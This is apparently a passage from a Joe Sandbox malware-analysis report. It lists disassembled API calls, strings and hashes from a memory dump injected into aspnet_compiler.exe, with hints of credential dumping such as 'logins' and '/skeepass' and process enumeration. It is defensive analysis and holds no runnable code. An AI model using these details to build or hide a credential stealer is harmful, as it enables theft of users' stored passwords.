                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                                                                  • API String ID: 2000436516-3842416460
                                                                                                                                                                                                                                                                  • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                                                                                  • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                                                                    • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                                                                    • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                                                                    • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                                                                                                  • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1043902810-0
                                                                                                                                                                                                                                                                  • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                                                                  • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                                                                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                  • API String ID: 2899246560-1542517562
                                                                                                                                                                                                                                                                  • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                                                                                                  • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3715365532-3916222277
                                                                                                                                                                                                                                                                  • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                                                                                                                                                                                  • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                                                                    • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                                                                                                    • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                                                                    • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                                                                                                  • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                                                                                                                                                                  • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                                                                                                  • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                                                                                                  • API String ID: 3330709923-517860148
                                                                                                                                                                                                                                                                  • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                                                                                                  • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                                                                                                  • _wtoi.MSVCRT ref: 004081AF
                                                                                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                                                                                                    • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                                                                                                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                                                                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                                                                                                                                                                                                                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                                                                                                                                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                                                                                                                                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                                                                                                                                                                                                                                    • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                                                                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                                                                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                                                                                                  • String ID: logins$null
                                                                                                                                                                                                                                                                  • API String ID: 3492182834-2163367763
                                                                                                                                                                                                                                                                  • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                                                                                                  • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00408606
                                                                                                                                                                                                                                                                  • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                                                                                                  • _mbscpy.MSVCRT ref: 004086DB
                                                                                                                                                                                                                                                                  • _mbscpy.MSVCRT ref: 004086FA
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                                                                                                  • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                                                                  • String ID: ---
                                                                                                                                                                                                                                                                  • API String ID: 3437578500-2854292027
                                                                                                                                                                                                                                                                  • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                                                                                                                  • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                                                                  • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                                                                  • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1010922700-0
                                                                                                                                                                                                                                                                  • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                                                                                  • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                                                                  • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                                                                                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                                                                                                                                                                                                                                  • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                                                                                                  • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                                                                                                  • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??3@$FullNamePath$malloc$Version
                                                                                                                                                                                                                                                                  • String ID: |A
                                                                                                                                                                                                                                                                  • API String ID: 4233704886-1717621600
                                                                                                                                                                                                                                                                  • Opcode ID: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                                                                                                                                                                  • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcsicmp
                                                                                                                                                                                                                                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                                                                                  • API String ID: 2081463915-1959339147
                                                                                                                                                                                                                                                                  • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                                                                                  • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                                                                  • API String ID: 2012295524-70141382
                                                                                                                                                                                                                                                                  • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                                                                                                                                  • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModule
